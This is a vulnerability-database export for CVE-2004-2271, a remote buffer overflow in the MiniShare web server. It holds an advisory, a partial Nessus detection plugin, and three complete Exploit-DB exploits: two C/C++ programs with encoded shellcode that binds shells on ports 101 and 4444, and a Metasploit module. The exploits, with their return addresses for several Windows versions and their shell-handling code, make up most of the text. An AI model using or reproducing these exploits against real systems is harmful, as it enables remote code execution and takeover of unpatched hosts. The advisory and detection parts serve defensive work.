[{"lastseen": "2017-04-28T13:20:07", "bulletinFamily": "software", "cvelist": ["CVE-2004-2271"], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in MiniShare. The application fails to perform proper bounds checking resulting in a buffer overflow. With a specially crafted HTTP GET request, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.\n## Solution Description\nUpgrade to version 1.4.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nA remote overflow exists in MiniShare. The application fails to perform proper bounds checking resulting in a buffer overflow. With a specially crafted HTTP GET request, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.\n## References:\nVendor URL: http://minishare.sourceforge.net\nSecurity Tracker: 1012106\n[Secunia Advisory ID:13114](https://secuniaresearch.flexerasoftware.com/advisories/13114/)\nOther Advisory URL: http://www.securiteam.com/exploits/6X00B1PBPC.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2004-11/0208.html\nISS X-Force ID: 17978\n[CVE-2004-2271](https://vulners.com/cve/CVE-2004-2271)\nBugtraq ID: 11620\n", "modified": "2004-11-07T11:40:13", "published": "2004-11-07T11:40:13", "id": "OSVDB:11530", "href": "https://vulners.com/osvdb/OSVDB:11530", "title": "MiniShare HTTP GET Request Remote Overflow", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T12:33:00", "description": "MiniShare. CVE-2004-2271. Remote exploit for windows platform", "published": "2004-11-07T00:00:00", "type": "exploitdb", "title": "MiniShare <= 1.4.1 - Remote Buffer Overflow Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-2271"], "modified": "2004-11-07T00:00:00", "id": "EDB-ID:616", "href": "https://www.exploit-db.com/exploits/616/", "sourceData": "/*\r\n\r\n\r\n\r\nMiniShare <= 1.4.1, Remote Buffer Overflow Exploit v0.1.\r\nBind a shellcode to the port 101.\r\n\r\nFull disclosure and exploit \r\nby class101 [at] DFind.kd-team.com [&] #n3ws [at] EFnet\r\n07 november 2004\r\n\r\nThanx to HDMoore and Metasploit.com for their kickass ASM work.\r\n\r\n\r\n------------------\r\nWHAT IS MINISHARE\r\n------------------\r\n\r\nHomepage - http://minishare.sourceforge.net/\r\n\t\r\n\tMiniShare is meant to serve anyone who has the need to share files to anyone,\r\n\tdoesn't have a place to store the files on the web, \r\n and does not want or simply does not have the skill\r\n\tand possibility to set up and maintain a complete HTTP-server software...\r\n\r\n--------------\r\nVULNERABILITY\r\n--------------\r\n\r\n\tA simple buffer overflow in the link length, nothing more\r\n\tread the code for further instructions.\r\n\r\n----\r\nFIX\r\n----\r\n\r\n\tActually none, the vendor is contacted the same day published, 1 hour before you.\r\n As a nice fuck to NGSS , iDEFENSE and all others private disclosures\r\n\thomo crew ainsi que K-OTiK, ki se tap' des keu dans leur \"Lab\"\r\n\tlol :->\r\n\r\n----\r\nEXTRA\r\n----\r\n \r\n\tUpdate the JMP ESP if you need. A wrong offset will crash minishare.\r\n\tCode tested working on MiniShare 1.4.1 and WinXP SP1 English, Win2k SP4 English, WinNT SP6 English\r\n\tOthers MiniShare's versions aren't tested.\r\n Tip: If it crashes for you , try to play with Sleep()...\r\n\r\n----\r\nBY\r\n----\r\n\r\n class101 [at] DFind.kd-team.com [&] #n3ws [at] EFnet\r\n\t\t\t\t\t\t who\r\n\t\t\t\t\t\tgreets\r\n DiabloHorn [at] www.kd-team.com [&] #kd-team [at] EFnet\r\n\r\n*/\r\n\r\n\r\n\r\n\r\n#include \"winsock2.h\"\r\n#include \"fstream.h\"\r\n\r\n#pragma comment(lib, \"ws2_32\")\r\n\r\n\r\n\r\n\r\n//380 bytes, BIND shellcode port 101, XORed 0x88, thanx HDMoore. \r\n\r\nchar scode[] =\r\n\"\\xEB\"\r\n\"\\x0F\\x58\\x80\\x30\\x88\\x40\\x81\\x38\\x68\\x61\\x63\\x6B\\x75\\xF4\\xEB\\x05\\xE8\\xEC\\xFF\\xFF\"\r\n\"\\xFF\\x60\\xDE\\x88\\x88\\x88\\xDB\\xDD\\xDE\\xDF\\x03\\xE4\\xAC\\x90\\x03\\xCD\\xB4\\x03\\xDC\\x8D\"\r\n\"\\xF0\\x89\\x62\\x03\\xC2\\x90\\x03\\xD2\\xA8\\x89\\x63\\x6B\\xBA\\xC1\\x03\\xBC\\x03\\x89\\x66\\xB9\"\r\n\"\\x77\\x74\\xB9\\x48\\x24\\xB0\\x68\\xFC\\x8F\\x49\\x47\\x85\\x89\\x4F\\x63\\x7A\\xB3\\xF4\\xAC\\x9C\"\r\n\"\\xFD\\x69\\x03\\xD2\\xAC\\x89\\x63\\xEE\\x03\\x84\\xC3\\x03\\xD2\\x94\\x89\\x63\\x03\\x8C\\x03\\x89\"\r\n\"\\x60\\x63\\x8A\\xB9\\x48\\xD7\\xD6\\xD5\\xD3\\x4A\\x80\\x88\\xD6\\xE2\\xB8\\xD1\\xEC\\x03\\x91\\x03\"\r\n\"\\xD3\\x84\\x03\\xD3\\x94\\x03\\x93\\x03\\xD3\\x80\\xDB\\xE0\\x06\\xC6\\x86\\x64\\x77\\x5E\\x01\\x4F\"\r\n\"\\x09\\x64\\x88\\x89\\x88\\x88\\xDF\\xDE\\xDB\\x01\\x6D\\x60\\xAF\\x88\\x88\\x88\\x18\\x89\\x88\\x88\"\r\n\"\\x3E\\x91\\x90\\x6F\\x2C\\x91\\xF8\\x61\\x6D\\xC1\\x0E\\xC1\\x2C\\x92\\xF8\\x4F\\x2C\\x25\\xA6\\x61\"\r\n\"\\x51\\x81\\x7D\\x25\\x43\\x65\\x74\\xB3\\xDF\\xDB\\xBA\\xD7\\xBB\\xBA\\x88\\xD3\\x05\\xC3\\xA8\\xD9\"\r\n\"\\x77\\x5F\\x01\\x57\\x01\\x4B\\x05\\xFD\\x9C\\xE2\\x8F\\xD1\\xD9\\xDB\\x77\\xBC\\x07\\x77\\xDD\\x8C\"\r\n\"\\xD1\\x01\\x8C\\x06\\x6A\\x7A\\xA3\\xAF\\xDC\\x77\\xBF\\x77\\xDD\\xB8\\xB9\\x48\\xD8\\xD8\\xD8\\xD8\"\r\n\"\\xC8\\xD8\\xC8\\xD8\\x77\\xDD\\xA4\\x01\\x4F\\xB9\\x53\\xDB\\xDB\\xE0\\x8A\\x88\\x88\\xED\\x01\\x68\"\r\n\"\\xE2\\x98\\xD8\\xDF\\x77\\xDD\\xAC\\xDB\\xDF\\x77\\xDD\\xA0\\xDB\\xDC\\xDF\\x77\\xDD\\xA8\\x01\\x4F\"\r\n\"\\xE0\\xCB\\xC5\\xCC\\x88\\x01\\x6B\\x0F\\x72\\xB9\\x48\\x05\\xF4\\xAC\\x24\\xE2\\x9D\\xD1\\x7B\\x23\"\r\n\"\\x0F\\x72\\x09\\x64\\xDC\\x88\\x88\\x88\\x4E\\xCC\\xAC\\x98\\xCC\\xEE\\x4F\\xCC\\xAC\\xB4\\x89\\x89\"\r\n\"\\x01\\xF4\\xAC\\xC0\\x01\\xF4\\xAC\\xC4\\x01\\xF4\\xAC\\xD8\\x05\\xCC\\xAC\\x98\\xDC\\xD8\\xD9\\xD9\"\r\n\"\\xD9\\xC9\\xD9\\xC1\\xD9\\xD9\\xDB\\xD9\\x77\\xFD\\x88\\xE0\\xFA\\x76\\x3B\\x9E\\x77\\xDD\\x8C\\x77\"\r\n\"\\x58\\x01\\x6E\\x77\\xFD\\x88\\xE0\\x25\\x51\\x8D\\x46\\x77\\xDD\\x8C\\x01\\x4B\\xE0\\x77\\x77\\x77\"\r\n\"\\x77\\x77\\xBE\\x77\\x5B\\x77\\xFD\\x88\\xE0\\xF6\\x50\\x6A\\xFB\\x77\\xDD\\x8C\\xB9\\x53\\xDB\\x77\"\r\n\"\\x58\\x68\\x61\\x63\\x6B\\x90\";\r\n\r\n/*\r\n\r\n//116 bytes, execute regedit.exe, XORed 0x88, hardcoded WinXP SP1 English\r\n\r\nchar scode+[] =\r\n\"\\xEB\"\r\n\"\\x0F\\x58\\x80\\x30\\x88\\x40\\x81\\x38\\x68\\x61\\x63\\x6B\\x75\\xF4\\xEB\\x05\\xE8\\xEC\\xFF\\xFF\"\r\n\"\\xFF\\xDD\\x01\\x6D\\x09\\x64\\xC4\\x88\\x88\\x88\\xDB\\x05\\xF5\\x3C\\x4E\\xCD\\x7C\\xFA\\x4E\\xCD\"\r\n\"\\x7D\\xED\\x4E\\xCD\\x7E\\xEF\\x4E\\xCD\\x7F\\xED\\x4E\\xCD\\x70\\xEC\\x4E\\xCD\\x71\\xE1\\x4E\\xCD\"\r\n\"\\x72\\xFC\\x4E\\xCD\\x73\\xA6\\x4E\\xCD\\x74\\xED\\x4E\\xCD\\x75\\xF0\\x4E\\xCD\\x76\\xED\\x4E\\xCD\"\r\n\"\\x77\\x88\\xE0\\x8D\\x88\\x88\\x88\\x05\\xCD\\x7C\\xD8\\x30\\xE8\\x75\\x6E\\xFF\\x77\\x58\\xE0\\x89\"\r\n\"\\x88\\x88\\x88\\x30\\xEB\\x10\\x6F\\xFF\\x77\\x58\\x68\\x61\\x63\\x6B\\x90\";\r\n\r\n//565 bytes, execute regedit.exe, alphanumeric, hardcoded WinXP SP1 English\r\n\r\nchar scode+[]=\r\n\"LLLLYhbSgCX5bSgCHQVPPTQPPaRVVUSBRDJfh2ADTY09VQa0tkafhXMfXf1Dkbf1TkbjgY0Lkd0TkdfhH\"\r\n\"CfYf1LkfjiY0Lkh0tkjjOX0Dkkf1TkljxY0Lko0Tko0TkqjfY0Lks0tks0Tkuj1Y0Lkw0tkw0tkyCjyY0\"\r\n\"Lkz0TkzCC0tkzCCjmY0Lkz0TkzCC0TkzCCjhX0Dkz0tkzCC0tkzCCjPX0Dkz0TkzCC0tkzCCjfY0Lkz0T\"\r\n\"kzCjjX0DkzC0TkzCCjeX0Dkz0tkzCC0TkzCCjvX0Dkz0tkzCC0TkzCCj3X0Dkz0tkzCC0tkzCCjOX0Dkz\"\r\n\"0tkzCjaX0DkzCChuucTX1DkzCCCC0tkzCCjaY0Lkz0TkzCC0tkzCjRY0LkzCfhNUfXf1Dkzf1TkzCCCfh\"\r\n\"hhfYf1Lkzf1TkzCCChS4ciX1DkzCCCC0TkzCC0tkzCjKY0Lkz0TkzCCfhzhfXf1Dkzf1TkzUvB3tLHCiS\"\r\n\"r2K9Esr9Ele9E8g9Eqe9Ejd9Eni9EUt9EbD9Efe9Etx9E2e9EOahpucTrEjPG2LLwhGhR4ciGcgSwzG\";\r\n\r\n*/\r\n\r\nstatic char payload[5000];\r\n\r\nchar espxp1en[]=\"\\x33\\x55\\xdc\\x77\"; //JMP ESP - user32.dll - WinXP SP1 English\r\nchar esp2k4en[]=\"\\xb8\\x9e\\xe3\\x77\"; //JMP ESP - user32.dll - Win2k SP4 English\r\nchar espnt6en[]=\"\\xf8\\x29\\xf3\\x77\"; //JMP ESP - kernel32.dll - WinNT SP6 English\r\n\r\nvoid usage(char* us);\r\nWSADATA wsadata;\r\nvoid ver();\r\n\r\nint main(int argc,char *argv[])\r\n{\r\n\tver();\r\n\tif ((argc<3)||(argc>4)||(atoi(argv[1])<1)||(atoi(argv[1])>2)){usage(argv[0]);return -1;}\r\n\tif (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){cout<<\"[+] wsastartup error: \"<<WSAGetLastError()<<endl;return -1;}\r\n\tint ip=htonl(inet_addr(argv[2])), sz, port, sizeA, sizeB, sizeC, a, b, c;\r\n\tchar *target, *os;\r\n\tif (argc==4){port=atoi(argv[3]);}\r\n\telse port=80;\r\n\tif (atoi(argv[1]) == 1){target=espxp1en;os=\"WinXP SP1 English\";}\r\n\tif (atoi(argv[1]) == 2){target=esp2k4en;os=\"Win2k SP4 English\";}\r\n\tif (atoi(argv[1]) == 3){target=espnt6en;os=\"WinNT SP6 English\";}\r\n\tSOCKET s;\r\n\tstruct fd_set mask;\r\n\tstruct timeval timeout; \r\n\tstruct sockaddr_in server;\r\n\ts=socket(AF_INET,SOCK_STREAM,0);\r\n\tif (s==INVALID_SOCKET){ cout<<\"[+] socket() error: \"<<WSAGetLastError()<<endl;WSACleanup();return -1;}\r\n\tcout<<\"[+] target: \"<<os<<endl;\t\t\t\r\n\tserver.sin_family=AF_INET;\r\n\tserver.sin_addr.s_addr=htonl(ip);\r\n\tserver.sin_port=htons(port);\r\n\tWSAConnect(s,(struct sockaddr *)&server,sizeof(server),NULL,NULL,NULL,NULL);\r\n\ttimeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);\r\n\tswitch(select(s+1,NULL,&mask,NULL,&timeout))\r\n\t{\r\n\t\tcase -1: {cout<<\"[+] select() error: \"<<WSAGetLastError()<<endl;closesocket(s);return -1;}\r\n\t\tcase 0: {cout<<\"[+] connection failed.\"<<endl;closesocket(s);return -1;}\r\n\t\tdefault:\r\n\t\tif(FD_ISSET(s,&mask))\r\n\t\t{\r\n\t\t\tcout<<\"[+] connected, constructing the payload...\"<<endl;\r\n\t\t\tSleep(1000);\r\n\t\t\tsizeA=1787;\r\n\t\t\tsizeB=414-sizeof(scode);\r\n\t\t\tsizeC=10;\r\n\t\t\tsz=sizeA+sizeB+sizeC+sizeof(scode)+17;\r\n\t\t\tmemset(payload,0,sizeof(payload));\r\n\t\t\tstrcat(payload,\"GET \");\r\n\t\t\tfor (a=0;a<sizeA;a++){strcat(payload,\"\\x41\");}\r\n\t\t\tstrcat(payload,target);\r\n\t\t\tfor (b=0;b<sizeB;b++){strcat(payload,\"\\x41\");}\r\n\t\t\tstrcat(payload,scode);\r\n\t\t\tfor (c=0;c<sizeC;c++){strcat(payload,\"\\x41\");}\r\n\t\t\tstrcat(payload,\" HTTP/1.1\\r\\n\\r\\n\");\r\n\t\t\tSleep(1000);\r\n\t\t if (send(s,payload,strlen(payload),0)==SOCKET_ERROR) { cout<<\"[+] sending error, the server prolly rebooted.\"<<endl;return -1;}\r\n\t\t\tSleep(1000);\r\n\t\t\tcout<<\"[+] size of payload: \"<<sz<<endl;\t\t\t\r\n\t\t\tcout<<\"[+] payload send, connect the port 101 to get a shell.\"<<endl;\r\n\t\t\treturn 0;\r\n\t\t}\r\n\t}\r\n\tclosesocket(s);\r\n\tWSACleanup();\r\n\treturn 0;\r\n}\r\n\r\n\r\nvoid usage(char* us) \r\n{ \r\n\tcout<<\"USAGE: 101_mini.exe Target Ip Port\\n\"<<endl;\r\n\tcout<<\"TARGETS: \"<<endl;\r\n\tcout<<\" [+] 1. WinXP SP1 English (*)\"<<endl;\r\n\tcout<<\" [+] 2. Win2k SP4 English (*)\"<<endl;\r\n\tcout<<\" [+] 3. WinNT SP6 English (*)\"<<endl;\r\n\tcout<<\"NOTE: \"<<endl;\r\n\tcout<<\" The port 80 is default if no port specified\"<<endl;\r\n\tcout<<\" The exploit bind a shellcode to the port 101\"<<endl;\r\n\tcout<<\" A wildcard (*) mean Tested.\"<<endl;\r\n\treturn;\r\n} \r\n\r\nvoid ver()\r\n{\t\r\ncout<<endl;\r\ncout<<\" \"<<endl;\r\ncout<<\" ===================================================[v0.1]====\"<<endl;\r\ncout<<\" ====MiniShare, Minimal HTTP Server for Windows <= v1.4.1=====\"<<endl; \r\ncout<<\" =============Remote Buffer Overflow Exploit==================\"<<endl;\r\ncout<<\" ====coded by class101===========[DFind.kd-team.com 2004]=====\"<<endl;\r\ncout<<\" =============================================================\"<<endl;\r\ncout<<\" \"<<endl;\r\n}\r\n\r\n// milw0rm.com [2004-11-07]\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/616/"}, {"lastseen": "2016-01-31T12:35:05", "description": "MiniShare Remote Buffer Overflow Exploit (c source). CVE-2004-2271. Remote exploit for windows platform", "published": "2004-11-16T00:00:00", "type": "exploitdb", "title": "MiniShare 1.4.1 - Remote Buffer Overflow Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-2271"], "modified": "2004-11-16T00:00:00", "id": "EDB-ID:636", "href": "https://www.exploit-db.com/exploits/636/", "sourceData": "/*\r\nno@0x00:~/Exploits/minishare$ ./mini-exploit 10.20.30.2\r\n\r\n***MiniShare remote buffer overflow UNIX exploit by NoPh0BiA.***\r\n\r\n[x] Connected to: 10.20.30.2 on port 80.\r\n[x] Sending bad code..done.\r\n[x] Trying to connect to: 10.20.30.2 on port 4444..\r\n[x] 0wn3d!\r\n\r\nMicrosoft Windows 2000 [Version 5.00.2195]\r\n(C) Copyright 1985-2000 Microsoft Corp.\r\n\r\nE:\\Program Files\\MiniShare>\r\n\r\nGreetz to NtWaK0,kane,kamalo,foufz, and schap :)\r\nhttp://NoPh0BiA.lostspirits.org\r\n\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <sys/socket.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h>\r\n#include <errno.h>\r\n#include <netinet/in.h>\r\n#include <fcntl.h>\r\n\r\n#define PORT 80\r\n#define PORT1 4444\r\n#define RET \"\\xB8\\x9E\\xE3\\x77\" /*2k sp2*/\r\n\r\nchar shellcode[]=\r\n\"\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x31\\xc9\\xb1\\x5e\\x81\\x73\\x17\\x34\\x0a\"\r\n\"\\x2f\\xfd\\x83\\xeb\\xfc\\xe2\\xf4\\xc8\\xe2\\x79\\xfd\\x34\\x0a\\x7c\\xa8\\x62\"\r\n\"\\x5d\\xa4\\x91\\x10\\x12\\xa4\\xb8\\x08\\x81\\x7b\\xf8\\x4c\\x0b\\xc5\\x76\\x7e\"\r\n\"\\x12\\xa4\\xa7\\x14\\x0b\\xc4\\x1e\\x06\\x43\\xa4\\xc9\\xbf\\x0b\\xc1\\xcc\\xcb\"\r\n\"\\xf6\\x1e\\x3d\\x98\\x32\\xcf\\x89\\x33\\xcb\\xe0\\xf0\\x35\\xcd\\xc4\\x0f\\x0f\"\r\n\"\\x76\\x0b\\xe9\\x41\\xeb\\xa4\\xa7\\x10\\x0b\\xc4\\x9b\\xbf\\x06\\x64\\x76\\x6e\"\r\n\"\\x16\\x2e\\x16\\xbf\\x0e\\xa4\\xfc\\xdc\\xe1\\x2d\\xcc\\xf4\\x55\\x71\\xa0\\x6f\"\r\n\"\\xc8\\x27\\xfd\\x6a\\x60\\x1f\\xa4\\x50\\x81\\x36\\x76\\x6f\\x06\\xa4\\xa6\\x28\"\r\n\"\\x81\\x34\\x76\\x6f\\x02\\x7c\\x95\\xba\\x44\\x21\\x11\\xcb\\xdc\\xa6\\x3a\\xb5\"\r\n\"\\xe6\\x2f\\xfc\\x34\\x0a\\x78\\xab\\x67\\x83\\xca\\x15\\x13\\x0a\\x2f\\xfd\\xa4\"\r\n\"\\x0b\\x2f\\xfd\\x82\\x13\\x37\\x1a\\x90\\x13\\x5f\\x14\\xd1\\x43\\xa9\\xb4\\x90\"\r\n\"\\x10\\x5f\\x3a\\x90\\xa7\\x01\\x14\\xed\\x03\\xda\\x50\\xff\\xe7\\xd3\\xc6\\x63\"\r\n\"\\x59\\x1d\\xa2\\x07\\x38\\x2f\\xa6\\xb9\\x41\\x0f\\xac\\xcb\\xdd\\xa6\\x22\\xbd\"\r\n\"\\xc9\\xa2\\x88\\x20\\x60\\x28\\xa4\\x65\\x59\\xd0\\xc9\\xbb\\xf5\\x7a\\xf9\\x6d\"\r\n\"\\x83\\x2b\\x73\\xd6\\xf8\\x04\\xda\\x60\\xf5\\x18\\x02\\x61\\x3a\\x1e\\x3d\\x64\"\r\n\"\\x5a\\x7f\\xad\\x74\\x5a\\x6f\\xad\\xcb\\x5f\\x03\\x74\\xf3\\x3b\\xf4\\xae\\x67\"\r\n\"\\x62\\x2d\\xfd\\x25\\x56\\xa6\\x1d\\x5e\\x1a\\x7f\\xaa\\xcb\\x5f\\x0b\\xae\\x63\"\r\n\"\\xf5\\x7a\\xd5\\x67\\x5e\\x78\\x02\\x61\\x2a\\xa6\\x3a\\x5c\\x49\\x62\\xb9\\x34\"\r\n\"\\x83\\xcc\\x7a\\xce\\x3b\\xef\\x70\\x48\\x2e\\x83\\x97\\x21\\x53\\xdc\\x56\\xb3\"\r\n\"\\xf0\\xac\\x11\\x60\\xcc\\x6b\\xd9\\x24\\x4e\\x49\\x3a\\x70\\x2e\\x13\\xfc\\x35\"\r\n\"\\x83\\x53\\xd9\\x7c\\x83\\x53\\xd9\\x78\\x83\\x53\\xd9\\x64\\x87\\x6b\\xd9\\x24\"\r\n\"\\x5e\\x7f\\xac\\x65\\x5b\\x6e\\xac\\x7d\\x5b\\x7e\\xae\\x65\\xf5\\x5a\\xfd\\x5c\"\r\n\"\\x78\\xd1\\x4e\\x22\\xf5\\x7a\\xf9\\xcb\\xda\\xa6\\x1b\\xcb\\x7f\\x2f\\x95\\x99\"\r\n\"\\xd3\\x2a\\x33\\xcb\\x5f\\x2b\\x74\\xf7\\x60\\xd0\\x02\\x02\\xf5\\xfc\\x02\\x41\"\r\n\"\\x0a\\x47\\x0d\\xbe\\x0e\\x70\\x02\\x61\\x0e\\x1e\\x26\\x67\\xf5\\xff\\xfd\";\r\n\r\nstruct sockaddr_in hrm;\r\n\r\nvoid shell(int sock)\r\n{\r\nfd_set fd_read;\r\nchar buff[1024];\r\nint n;\r\n\r\nwhile(1) {\r\nFD_SET(sock,&fd_read);\r\nFD_SET(0,&fd_read);\r\n\r\nif(select(sock+1,&fd_read,NULL,NULL,NULL)<0) break;\r\n\r\nif( FD_ISSET(sock, &fd_read) ) {\r\nn=read(sock,buff,sizeof(buff));\r\nif (n == 0) {\r\nprintf (\"Connection closed.\\n\");\r\nexit(EXIT_FAILURE);\r\n} else if (n < 0) {\r\nperror(\"read remote\");\r\nexit(EXIT_FAILURE);\r\n}\r\nwrite(1,buff,n);\r\n}\r\n\r\nif ( FD_ISSET(0, &fd_read) ) {\r\nif((n=read(0,buff,sizeof(buff)))<=0){\r\nperror (\"read user\");\r\nexit(EXIT_FAILURE);\r\n}\r\nwrite(sock,buff,n);\r\n}\r\n}\r\nclose(sock);\r\n}\r\n\r\nint conn(char *ip, int p)\r\n{\r\nint sockfd;\r\nhrm.sin_family = AF_INET;\r\nhrm.sin_port = htons(p);\r\nhrm.sin_addr.s_addr = inet_addr(ip);\r\nbzero(&(hrm.sin_zero),8);\r\nsockfd=socket(AF_INET,SOCK_STREAM,0);\r\nif((connect(sockfd,(struct sockaddr*)&hrm,sizeof(struct sockaddr))) < 0 )\r\n{\r\nperror(\"connect\");\r\nexit(0);\r\n}\r\nreturn sockfd;\r\n}\r\n\r\nint main(int argc, char *argv[])\r\n{\r\nif(argc < 2)\r\n{\r\nprintf(\"Usage: TARGET.\\n\");\r\nexit(0);\r\n}\r\nchar *buffer = malloc(2220),*B=malloc(30),*target=argv[1];\r\nint x,y;\r\nprintf(\"\\n***MiniShare remote buffer overflow UNIX exploit by NoPh0BiA.***\\n\\n\");\r\nmemset(buffer,'\\0',2220);\r\nmemset(B,0x42,30);\r\nmemset(buffer,0x41,1787);\r\nstrcat(buffer,RET);\r\nstrcat(buffer,B);\r\nstrcat(buffer,shellcode);\r\nif((x = conn(target,PORT)))\r\nprintf(\"[x] Connected to: %s on port %d.\\n\",target,PORT);\r\nsleep(3);\r\nprintf(\"[x] Sending bad code..\");\r\nwrite(x,\"GET \",4);\r\nwrite(x,buffer,2220);\r\nwrite(x,\" HTTP/1.1\\r\\n\\r\\n\",13);\r\nsleep(3);\r\nprintf(\"done.\\n\");\r\nprintf(\"[x] Trying to connect to: %s on port %d..\\n\",target,PORT1);\r\nif((y=conn(target,PORT1)))\r\n{\r\nprintf(\"[x] 0wn3d!\\n\\n\");\r\nshell(y);\r\n}\r\n\r\n}\r\n\r\n// milw0rm.com [2004-11-16]\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/636/"}, {"lastseen": "2016-02-02T06:26:29", "description": "Minishare 1.4.1 Buffer Overflow. CVE-2004-2271. Remote exploit for windows platform", "published": "2010-05-09T00:00:00", "type": "exploitdb", "title": "Minishare 1.4.1 - Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-2271"], "modified": "2010-05-09T00:00:00", "id": "EDB-ID:16754", "href": "https://www.exploit-db.com/exploits/16754/", "sourceData": "##\r\n# $Id: minishare_get_overflow.rb 9262 2010-05-09 17:45:00Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = AverageRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Minishare 1.4.1 Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis is a simple buffer overflow for the minishare web\r\n\t\t\t\tserver. This flaw affects all versions prior to 1.4.2. This\r\n\t\t\t\tis a plain stack buffer overflow that requires a \"jmp esp\" to reach\r\n\t\t\t\tthe payload, making this difficult to target many platforms\r\n\t\t\t\tat once. This module has been successfully tested against\r\n\t\t\t\t1.4.1. Version 1.3.4 and below do not seem to be vulnerable.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'acaro <acaro@jervus.it>' ],\r\n\t\t\t'License' => BSD_LICENSE,\r\n\t\t\t'Version' => '$Revision: 9262 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2004-2271'],\r\n\t\t\t\t\t[ 'OSVDB', '11530'],\r\n\t\t\t\t\t[ 'BID', '11620'],\r\n\t\t\t\t\t[ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2004-11/0208.html'],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c\\x40\",\r\n\t\t\t\t\t'MinNops' => 64,\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['Windows 2000 SP0-SP3 English', { 'Rets' => [ 1787, 0x7754a3ab ]}], # jmp esp\r\n\t\t\t\t\t['Windows 2000 SP4 English', { 'Rets' => [ 1787, 0x7517f163 ]}], # jmp esp\r\n\t\t\t\t\t['Windows XP SP0-SP1 English', { 'Rets' => [ 1787, 0x71ab1d54 ]}], # push esp, ret\r\n\t\t\t\t\t['Windows XP SP2 English', { 'Rets' => [ 1787, 0x71ab9372 ]}], # push esp, ret\r\n\t\t\t\t\t['Windows 2003 SP0 English', { 'Rets' => [ 1787, 0x71c03c4d ]}], # push esp, ret\r\n\t\t\t\t\t['Windows NT 4.0 SP6', { 'Rets' => [ 1787, 0x77f329f8 ]}], # jmp esp\r\n\t\t\t\t\t['Windows XP SP2 German', { 'Rets' => [ 1787, 0x77d5af0a ]}], # jmp esp\r\n\t\t\t\t\t['Windows XP SP2 Polish', { 'Rets' => [ 1787, 0x77d4e26e ]}], # jmp esp\r\n\t\t\t\t\t['Windows XP SP2 French', { 'Rets' => [ 1787, 0x77d5af0a ]}], # jmp esp\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Nov 7 2004'))\r\n\tend\r\n\r\n\tdef exploit\r\n\t\turi = rand_text_alphanumeric(target['Rets'][0])\r\n\t\turi << [target['Rets'][1]].pack('V')\r\n\t\turi << payload.encoded\r\n\r\n\t\tprint_status(\"Trying target address 0x%.8x...\" % target['Rets'][1])\r\n\t\tsend_request_raw({\r\n\t\t\t'uri' => uri\r\n\t\t}, 5)\r\n\r\n\t\thandler\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/16754/"}], "nessus": [{"lastseen": "2020-06-16T02:55:12", "description": "MiniShare 1.4.1 and prior versions are affected by a buffer overflow \nflaw. A remote attacker could execute arbitrary commands by sending a\nspecially crafted file name in a the GET request.\n\nVersion 1.3.4 and below do not seem to be vulnerable.", "edition": 22, "published": "2005-06-06T00:00:00", "title": "MiniShare Webserver HTTP GET Request Remote Overflow", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-2271"], "modified": "2005-06-06T00:00:00", "cpe": [], "id": "MINISHARE_OVERFLOW.NASL", "href": "https://www.tenable.com/plugins/nessus/18424", "sourceData": "#\n# written by Gareth Phillips - SensePost PTY ltd (www.sensepost.com)\n#\n# Changes by Tenable:\n# - detect title to prevent false positives\n# - fix version detection\n# - added CVE xrefs.\n# - revised plugin title, changed family, update output formatting (8/18/09)\n\n\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(18424);\n script_version (\"1.24\");\n script_cve_id(\"CVE-2004-2271\");\n script_bugtraq_id (11620);\n\n script_name(english:\"MiniShare Webserver HTTP GET Request Remote Overflow\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by a remote buffer overflow 